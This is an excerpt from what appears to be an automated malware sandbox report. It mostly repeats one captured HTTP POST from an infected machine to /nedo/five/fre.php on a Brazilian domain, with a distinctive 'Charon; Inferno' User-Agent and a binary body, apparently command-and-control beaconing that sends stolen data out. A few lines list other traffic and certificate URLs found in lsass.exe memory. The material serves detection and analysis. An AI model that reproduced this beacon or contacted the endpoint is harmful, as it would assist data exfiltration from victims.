          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: global trafficHTTP traffic detected: POST /nedo/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: karinedocesesalgados.com.brAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0D53234Content-Length: 151Connection: close
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Nov 2021 14:29:01 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeContent-Length: 15Content-Type: text/htmlData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Nov 2021 14:29:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeContent-Length: 15Content-Type: text/htmlData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: lsass.exe, 0000000A.00000000.6703362780.000001CE61ACA000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: lsass.exe, 0000000A.00000002.10836282788.000001CE61C39000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
          Source: lsass.exe, 0000000A.00000000.6719182560.000001CE61A00000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
